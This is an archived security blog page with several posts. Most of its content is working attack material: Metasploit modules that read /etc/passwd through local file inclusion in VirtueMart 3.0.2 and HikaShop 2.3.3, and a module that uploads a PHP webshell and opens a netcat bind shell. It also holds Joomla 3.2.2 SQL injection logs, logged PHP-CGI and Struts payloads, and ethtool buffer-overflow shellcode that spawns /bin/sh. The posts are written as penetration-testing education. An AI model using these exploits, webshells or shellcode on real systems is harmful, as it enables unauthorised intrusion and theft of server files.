Sunday, 18 January 2015

[EN] kmt.apk - what's this?

Few days ago I found application for android named 'kmt.apk'.

I was wondering, what this app is doing... To check it, I used apktool.

Listing of files showed me AndroidManifest.xml, so I was hoping to find out
what this app needs to run. This is what I found:
AndroidManifest.xml

After checking that this app needs my location (or location of my phone),
I was curious, where (all?) those data are going. This is what I found:

jd-gui in action

jd-gui in action - sending params...

jd-gui in action - sending params...

Another one:
onCreate function


And that's how I found this link :)

So it seems that this application is checking information about your localization on your
phone, and sending them to this "erotte" web. For now we're done here. ;)

If you will have some nice APK files to analyse, let me know via email. Thanks.

Cheers,
o/

[EN] Checking Illusion Bot

I was checking other stuff, and suddenly found "Illusion Bot". Seems to be a small IRC DDoS Bot. ;]

Let see...

Download:
You can easily find it on the web





Unzipped it looks like this:

Unzipped

I decide to check webfiles first... but I don't understand all of it... ;]

Sorry - don't understand

So I decide to use nice and friendly 'string' command. Connected with few grep's:

Commands to use for this bot
 Of course in those PHP files (index.php and upgrade.php) you can find more things, like
how this backdoor is installing itself in the WWW server, or how it's sending commands, etc.

Bots tables
Base64 decoded files, now looks like this:



...and commands again:





Point of view from IDA:




And this is my favourite :D

can you see it? ;)




More, maybe soon. ;)

Cheers,
o/

Monday, 12 January 2015

[EN] VirtueMart 3 - LFI for Metasploit

Regarding to last few posts, below you can find another small poc exploit for LFI vulnerability found in latest (this time) VirtueMart (3.0.2).

Because it's for Joomla again, again it's based on HikaShop LFI poc.

Enjoy:

Preparing to exploit...

Raw results

And the code:
---<virtuemart_auth_lfi.rb>---

root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
        'Description' => %q{
                VirtueMart 3.0.2 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                More here: https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery
                                                  # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => ' 23.12.2014'))
      register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
      ], self.class)
    end

  def check
  end

  def fetchMd5(my_string)
    if my_string  =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end


  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")
    end

    print_status("[+] Good: " + req1.code.to_s)
    print_good("[+] Got cookie(s): " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Got token: "+ token.to_s)
    else
      print_status("[-] Token not found")
    end


    # now we need to do auth using that token and cookies
    print_status("[+] Trying to auth...")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
      }
    })

    print_good("[+] Code after auth: " + auth.code.to_s)


    # 3rd step: get + post params to lfi
    print_good('[+] Exploit...')
    readthis =  "../../../../../../../../../../../../../../../../../../etc/passwd"

    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_virtuemart',
                 'view'  => 'log',
                 'task'  => 'edit',
                 'logfile'    => readthis
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] Exploit response code: " + xpl.code.to_s)
      print_good("[+] Response body after attack:")
      print_status(xpl.body)
    else
      fail_with("[-] Cannot exploit it :C")
    end
  end # exploit

end

---<virtuemart_auth_lfi.rb>---

Pastebin version is here.


Cheers,
o/

Saturday, 3 January 2015

[EN] HikaShop LFI - Metasploit module

Nearly 2 weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.

Here we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.

Below you will find a dirty MSF poc for LFI vulnerability located in HikaShop 2.3.3. ;)

Let me know if your Joomla is vulnerable. ;) If you will have any troubles with running this poc,
just check how I've done that before or feel free to contact me with any questions/suggestions.

Loading exploit:

Running:





... and finally we will get the content of /etc/passwd:




Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HikaShop - LFI poc for authenticated users',
        'Description' => %q{
                HikaShop 2.3.3 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '03.01.2015'))
      register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
        OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
      ], self.class)
    end

  def check
  end

  def fetchMd5(my_string)
    if my_string  =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end


  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")
    end

    print_status("[+] Resp code: " + req1.code.to_s)
    print_good("[+] Cookie(s) : " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Token : "+ token.to_s)
    else
      print_status("[-] Token not found")
    end


    # now we need to do auth using that token and cookies
    print_status("[+] 2nd request (post with auth)")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
      }
    })

    print_good("[+] Code after auth: " + auth.code.to_s)


    # 3rd step: get + post params to lfi
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_hikashop',
                 'ctrl'  => 'view',
                 'task'  => 'edit',
                 'id'    => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] 3rd response code: " + xpl.code.to_s)
      print_good("[+] 3rd (full) response body:")
      print_status(xpl.body)
    else
      fail_with("[-] Cannot exploit it :C")
    end
  end # exploit

end
 
---<hikashop_auth_lfi.rb>---

And pastebin version is here.

Happy New Year! ;)




Tuesday, 30 December 2014

[EN] Your own modules for Metasploit

Sometimes during penetration tests we are using tools like Metasploit.
Last time I had a moment to check this more carefully.

I was wondering how can I automate exploitation process of vulnerabilities found in the past. One idea was to use MSF.

After docs:
to start using 'your own modules' (or external), you need to prepare your system a little bit.
I was using kali-1.0.7 with vmplayer. There I was using apache2 + PHP.

First of all we will create a vulnerable webapplication. This simple bug will be related to "upload vulnerability" (so our MSF module should upload webshell to target host).

Let's create 2 directories:
mkdir /var/www/upload
mkdir /var/www/upload/foto


Next, we need to change permissions of our 'foto' directory, to 777.
Next step will be creating an upload.php file in '/upload/' direcory.
(Code is borrowed from one tutorial found somewhere on the internet).

---<upload.php>---
root@kali:/var/www/upload# cat upload.php
<?php
$max_rozmiar = 1024*1024;
if (is_uploaded_file($_FILES['plik']['tmp_name'])) {
    if ($_FILES['plik']['size'] > $max_rozmiar) {
        echo 'Blad! Plik jest za duzy!';
    } else {
        echo 'Odebrano plik. Poczatkoowa nazwa: '.$_FILES['plik']['name'];
        echo '<br/>';
        if (isset($_FILES['plik']['type'])) {
            echo 'Typ: '.$_FILES['plik']['type'].'<br/>';
        }
        move_uploaded_file($_FILES['plik']['tmp_name'],
                $_SERVER['DOCUMENT_ROOT'].'/upload/foto/'.$_FILES['plik']['name']);
    }
} else {
   echo 'Blad przy przesylaniu danych!';
}

?>
root@kali:/var/www/upload#
---<upload.php>---
When we have all (vulnerable) files (and dirs) prepared, we can start configuring our 'msf environment'. Let's back to the docs:

---<doc>---*  Mirror the "real" Metasploit module paths
mkdir -p $HOME/.msf4/modules/exploit

*  Create an appropriate category # for our example we don't need it now ;)
mkdir -p $HOME/.msf4/modules/exploits/windows/fileformat

*  Create the module
...# we will get to it ;)

*  Test it all out
mkdir -p $HOME/.msf4/modules/exploits/test
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb http://yours/test_module.rb

* reload msf
msf > reload_all

* use your code
msf > use exploit/test/test_module
msf exploit(test_module) > info 
---<doc>---

Now, when our local OS is prepared and ready to use, we can move on to creating our simple module:

---<upload_check.rb>---

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Super cool shell upload',
      'Description'    => %q{
                This is super cool module for Metasploit to check if you can upload shell on target.
      },
      'Author'         =>
        [
          'HauntIT Blog'     # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://HauntIT.blogspot.com']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Any vulnerable upload ', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '28/12/2014'))
  end


  def check
    readurl = normalize_uri(target_uri.path, 'upload','upload.php')
    res = send_request_cgi({
      'uri'    => readurl,
      'method' => 'GET'
    })

    if res.code != 200
      return Msf::Exploit::CheckCode::Unknown
    end

    return Msf::Exploit::CheckCode::Safe
  end

  def exploit
    payload_name = "#{rand_text_alpha(10)}.php"

    shell = "<?php echo '<pre>';$c=$_GET['c'];shell_exec($c);?>"

    uri = normalize_uri(target_uri.path, 'upload','upload.php')

    data = Rex::MIME::Message.new
    data.add_part(shell, 'application/octet-stream', 'binary', "form-data; name=\"plik\"; filename=\"#{payload_name}\"")


    post_data = data.to_s

    payload_uri = normalize_uri(target_uri.path, 'upload','foto', payload_name)

    print_status("#{peer} - Uploading payload to #{payload_uri}")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => uri,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'vars_post' => { 'plik' => '#{payload_name}' },
      'data'     => post_data
    })

    if res.code != 200 || res.body =~ /Blad/
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    else
      print_status("Got shell ;>")
    end

    print_status("#{peer} - Executing payload #{payload_uri}")
    res = send_request_cgi({
      'uri'    => payload_uri,
      'method' => 'GET',
      'vars_get' => {'c' => 'id;nc -lvvp 4445 -e /bin/sh &'}
    })


  end
end

---<upload_check.rb>---
(Pastebin version is here.)

Now it's time to step "Test it all out", so let's upload our new module to ~/.msf4 directory and type reload_all in msfconsole. To get to our module, we need to type:

---<console>---
msf>  use exploit/test/upload_check

---<console>---

Exploitation should be:

---<sploit>---
msf exploit(upload_check) > exploit
[*] Started reverse handler on 192.168.108.133:4444
[*] 192.168.108.133:80 - Uploading payload to /upload/foto/UXpCFrWwkW.php
[*] Got shell ;>
[*] 192.168.108.133:80 - Executing payload /upload/foto/UXpCFrWwkW.php
---<sploit>---
 

 Now in second console, we will connect to attacked host:

---<console>---
root@kali:/var/www/upload# netstat -antp | grep 444
tcp        0      0 0.0.0.0:4445            0.0.0.0:*               LISTEN      21563/nc
root@kali:/var/www/upload#
root@kali:/var/www/upload# telnet 192.168.108.133 4445
Trying 192.168.108.133...
Connected to 192.168.108.133.
Escape character is '^]'.
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(...)
---<console>---


And that's all. ;)

Questions / ideas / comments?

Good luck with creating your own modules!


Tuesday, 23 December 2014

[EN] Vulnerabilities in popular plugins - Joomla case

Hi,

during last few months I was involved in multiple pentests (webapps, infrastructures) in multiple countries. That's why I didn't post here anything new (almost since last May ;) ).

For all of you who want to talk with me (faster than via email), you can reach me also at twitter.

For all of you, who are watching my blog - I have something new for you. A little mini-art-series where I describing multiple (mostly SQL Injection) vulnerabilitiesin multiple popular plugins (this time for Joomla).

If you want more (for example also for other popular content management systems) feel free to write to me.

Comments, ideas are welcome as always.

Article is now available here.
And also at PacketStormSecurity too.

Enjoy ;)

Saturday, 3 May 2014

How I meet your Joomla 3.2.2 SQL Injection

In March this year I found that Joomla 3.2.2 with default data
installed is vulnerable to SQL Injection attack.
 

After few lines from log from April,
you should know how it was done.

root@poc:/var/log/apache2# tail -n 1 -f access.log
10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6727 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+2%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+3%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+4%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+5%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6739 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+6%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6754 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+7%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+8%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6760 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+9%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; 

rv:29.0) Gecko/20100101 Firefox/29.0"


Joomla 3.2.2 error


Why I decide to publish it. And here you will find even more.


Enjoy
o/

Sunday, 27 April 2014

[EN] Bots in the log

Few weeks ago I decide to create another mini-honeypot.
To do this, I used Apache server with ModSecurity installed.

After few modifications of existing rules, next thing was to
create some 'log reader' to quick check if there is something
new (and interesting) in logs, or not. And of course, to
learn more about how bots are talking with my machine,
where they want to connect, and what 'exploits' they are
using.

During last few weeks I was observing multiple GET and POST
requests to Apache (where I have only index.html and robots.txt
file, but it wasn't a hint for attackers, because they scanned
all possible vulnerabilities anyway ;)).

For example, few very often requests was related to vulnerable phpMyAdmin installation and other old webapps:
---<code>---
# grep GET modsec_audit.log
GET /phpTest/zologize/axa.php HTTP/1.1
GET /phpMyAdmin/scripts/setup.php HTTP/1.1
GET /pma/scripts/setup.php HTTP/1.1
GET /myadmin/scripts/setup.php HTTP/1.1
GET / HTTP/1.1
GET /robots.txt HTTP/1.1
---<code>---

This is not the problem to find out what vulnerabilities was
tried to reach, let's google it:
 

---<code>---
POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1
---<code>---

As you can see, here is a very useful post 

(by SpiderLabs) about this vulnerability.

Of course you can now get 'tools' from this kind of POST (http://attackers-host/histool)
and read it. Often you will find bash script, trying to download pscan or some exploit to get-root on your machine. 

Kind of fun ;)

But probably nothing new...

Anyway, in a last few days I found interesting line in logs:
---<code>---
162.213.24.40 - - [25/Apr/2014:22:38:05 +0200] "GET /toplel.action?class[%27classLoader%27][%27resources%27][%27dirContext%27][%27docBase%27]=//162.213.24.40/toplel HTTP/1.0" 403 466 "-" "-"
---<code>---

I was a little surprised, because this was the first time I saw it in my logs. So I tried to find some information at google, and that's how I found a very nice post at SpamBotSecurity Forum
that this is a bug in Apache Struts but also please check this.

(Also 'toplel' seems to be a malware)

Probably in the future I will post here something new about it,
but now if you want, you can check my simple log reader to verify

if in your logs you will find something interesting.

Of course you can use another simple script to block
this kind of requests. Check this out:
---<code>---
# cat ban_modsec.sh
#!/bin/sh

# script to simple block all IP's from mod_security.log
MODSLOG="/var/log/apache2/modsec_audit.log"

#uniq IP addresses to block
echo ""
echo "In the last mod_security log, found : [`grep 200 $MODSLOG |grep 2014 | cut -d' ' -f 4|sort | uniq | wc -l`]"
echo ""
grep 200 $MODSLOG |grep 2014 | cut -d' ' -f 4|sort | uniq > 2ban.log

for line in `cat 2ban.log`; do
        iptables -A INPUT -s $line -j DROP
        echo "[+] $line - banned"
done
date >> 2ban.log
echo "-------------------------------------------" >> 2ban.log
echo "[+] Done."

---<code>---

If you have any ideas how can we build more secure servers
feel free to write a comment here.

Enjoy ;)

Tuesday, 15 April 2014

[EN] Just allow popup

k@lab:~/public_html/js$ cat xxx.html
<!-- seems to be simple ;]                       --!>
<!-- of course will work only with popup enabled --!>

<script>
function NewTab(url){
        var hi=window.open(url, '_blank');
        hi.focus();
}
NewTab(window.location);
</script>
k@lab:~/public_html/js$


;]

Friday, 11 April 2014

[EN] Old-school buffer overflow - ethtool

During last days I was checking some old apps for Slackware 9.1.

My goal was to find some useful bugs to write few exploits (just for practice of course).
During simple fuzzing, I found that 'ethtool' is vulnerable in few places to buffer overflow.

Below is a short note from testing (overflow in '-k' param):

---<code>---
tester@box:~/code/tests/ethtool-3 $ head README
ethtool is a small utility for examining and tuning your ethernet-based
network interface.  See the man page for more details.
tester@box:~/code/tests/ethtool-3 $ head NEWS

Version 3 - January 27, 2005

        * Feature: r8159 register dump support
        * Feature / bug fix: Support advertising gigabit ethernet
        * Bug fix: make sure to advertise 10baseT-HD
        * Other minor bug fixes.

Version 2 - August 17, 2004
 

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Offload parameters for 1ŔPh//shh/binăPSá°
                                         Íű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2$ whoami
tester
sh-3.2$

---<code>---

Few more options of ethtool are also vulnerable (seems to be the same buffer value):
---<code>---

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -K ` perl -e 'print "A"x44,"BBBB"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -K ` perl -e 'print "A"x44,"BBBB"'`
no offload settings changed

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -r ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -r ` perl -e 'print "A"x44,"BBBB"'`
Cannot restart autonegotiation: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -p ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -p ` perl -e 'print "A"x44,"BBBB"'`
Cannot identify NIC: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -t ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -t ` perl -e 'print "A"x44,"BBBB"'`
Cannot get driver information: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -s ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -s ` perl -e 'print "A"x44,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

---<code>---

And if we'll set chown for root and +s for ethtool, we will get:
---<code>---

tester@box:~/code/tests/ethtool-3 $ ls -la ethtool
-rwsr-sr-x 1 root root 203201 Apr  9 15:19 ethtool
tester@box:~/code/tests/ethtool-3 $ ./exthtool

        -=[ ethtool - local buffer overflow exploit ]=-

Offload parameters for 1ŔPh//shh/binăPSá°
                                         Í°ű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
